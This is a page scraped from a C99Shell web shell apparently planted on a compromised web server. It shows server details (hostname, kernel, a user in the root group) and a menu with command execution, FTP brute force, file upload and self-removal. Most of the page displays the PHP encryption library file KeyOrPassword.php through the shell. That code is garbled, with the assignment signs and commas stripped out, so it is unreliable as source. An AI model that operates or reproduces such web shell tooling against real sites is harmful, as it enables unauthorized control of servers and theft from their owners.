!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/inventory.picotech.app/public_html/vendor/defuse/php-encryption/src/   drwxr-xr-x
Free 29.17 GB of 117.98 GB (24.72%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     KeyOrPassword.php (4.35 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

namespace Defuse\Crypto;

use 
Defuse\Crypto\Exception as Ex;

final class 
KeyOrPassword
{
    const 
PBKDF2_ITERATIONS    100000;
    const 
SECRET_TYPE_KEY      1;
    const 
SECRET_TYPE_PASSWORD 2;

    
/**
     * @var int
     */
    
private $secret_type 0;

    
/**
     * @var Key|string
     */
    
private $secret;

    
/**
     * Initializes an instance of KeyOrPassword from a key.
     *
     * @param Key $key
     *
     * @return KeyOrPassword
     */
    
public static function createFromKey(Key $key)
    {
        return new 
KeyOrPassword(self::SECRET_TYPE_KEY$key);
    }

    
/**
     * Initializes an instance of KeyOrPassword from a password.
     *
     * @param string $password
     *
     * @return KeyOrPassword
     */
    
public static function createFromPassword($password)
    {
        return new 
KeyOrPassword(self::SECRET_TYPE_PASSWORD$password);
    }

    
/**
     * Derives authentication and encryption keys from the secret, using a slow
     * key derivation function if the secret is a password.
     *
     * @param string $salt
     *
     * @throws Ex\CryptoException
     * @throws Ex\EnvironmentIsBrokenException
     *
     * @return DerivedKeys
     */
    
public function deriveKeys($salt)
    {
        
Core::ensureTrue(
            
Core::ourStrlen($salt) === Core::SALT_BYTE_SIZE,
            
'Bad salt.'
        
);

        if (
$this->secret_type === self::SECRET_TYPE_KEY) {
            
Core::ensureTrue($this->secret instanceof Key);
            
/**
             * @psalm-suppress PossiblyInvalidMethodCall
             */
            
$akey Core::HKDF(
                
Core::HASH_FUNCTION_NAME,
                
$this->secret->getRawBytes(),
                
Core::KEY_BYTE_SIZE,
                
Core::AUTHENTICATION_INFO_STRING,
                
$salt
            
);
            
/**
             * @psalm-suppress PossiblyInvalidMethodCall
             */
            
$ekey Core::HKDF(
                
Core::HASH_FUNCTION_NAME,
                
$this->secret->getRawBytes(),
                
Core::KEY_BYTE_SIZE,
                
Core::ENCRYPTION_INFO_STRING,
                
$salt
            
);
            return new 
DerivedKeys($akey$ekey);
        } elseif (
$this->secret_type === self::SECRET_TYPE_PASSWORD) {
            
Core::ensureTrue(\is_string($this->secret));
            
/* Our PBKDF2 polyfill is vulnerable to a DoS attack documented in
             * GitHub issue #230. The fix is to pre-hash the password to ensure
             * it is short. We do the prehashing here instead of in pbkdf2() so
             * that pbkdf2() still computes the function as defined by the
             * standard. */

            /**
             * @psalm-suppress PossiblyInvalidArgument
             */
            
$prehash \hash(Core::HASH_FUNCTION_NAME$this->secrettrue);

            
$prekey Core::pbkdf2(
                
Core::HASH_FUNCTION_NAME,
                
$prehash,
                
$salt,
                
self::PBKDF2_ITERATIONS,
                
Core::KEY_BYTE_SIZE,
                
true
            
);
            
$akey Core::HKDF(
                
Core::HASH_FUNCTION_NAME,
                
$prekey,
                
Core::KEY_BYTE_SIZE,
                
Core::AUTHENTICATION_INFO_STRING,
                
$salt
            
);
            
/* Note the cryptographic re-use of $salt here. */
            
$ekey Core::HKDF(
                
Core::HASH_FUNCTION_NAME,
                
$prekey,
                
Core::KEY_BYTE_SIZE,
                
Core::ENCRYPTION_INFO_STRING,
                
$salt
            
);
            return new 
DerivedKeys($akey$ekey);
        } else {
            throw new 
Ex\EnvironmentIsBrokenException('Bad secret type.');
        }
    }

    
/**
     * Constructor for KeyOrPassword.
     *
     * @param int   $secret_type
     * @param mixed $secret      (either a Key or a password string)
     */
    
private function __construct($secret_type$secret)
    {
        
// The constructor is private, so these should never throw.
        
if ($secret_type === self::SECRET_TYPE_KEY) {
            
Core::ensureTrue($secret instanceof Key);
        } elseif (
$secret_type === self::SECRET_TYPE_PASSWORD) {
            
Core::ensureTrue(\is_string($secret));
        } else {
            throw new 
Ex\EnvironmentIsBrokenException('Bad secret type.');
        }
        
$this->secret_type $secret_type;
        
$this->secret $secret;
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0034 ]--